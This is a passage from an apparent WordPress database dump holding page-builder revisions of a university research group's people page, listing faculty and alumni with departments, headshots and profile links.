Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c158\",\"index\":1,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c163\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c163\",\"index\":0,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c163\",\"index\":2,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c163\",\"index\":1,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c168\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c168\",\"index\":0,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c168\",\"index\":2,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c168\",\"index\":1,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c173\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c173\",\"index\":2,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c173\",\"index\":1,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c178\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c178\",\"index\":2,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c182\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c182\",\"index\":2,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c182\",\"index\":1,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c187\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c187\",\"index\":2,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c187\",\"index\":1,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c194\",\"parentId\":\"182-c193\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c193\",\"parentId\":\"182-c192\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c192\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-12 16:36:28','2023-10-12 20:36:28','',562,'https://gsudice.dataconn.net/?p=1660',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1661,1,'2023-10-12 16:36:28','2023-10-12 20:36:28','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c58\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c58 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c59-outer\">\n            <div data-colibri-id=\"182-c59\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c59 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-986 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\" class=\"wp-image-1646 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-1.jpeg\" class=\"wp-image-1648 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg 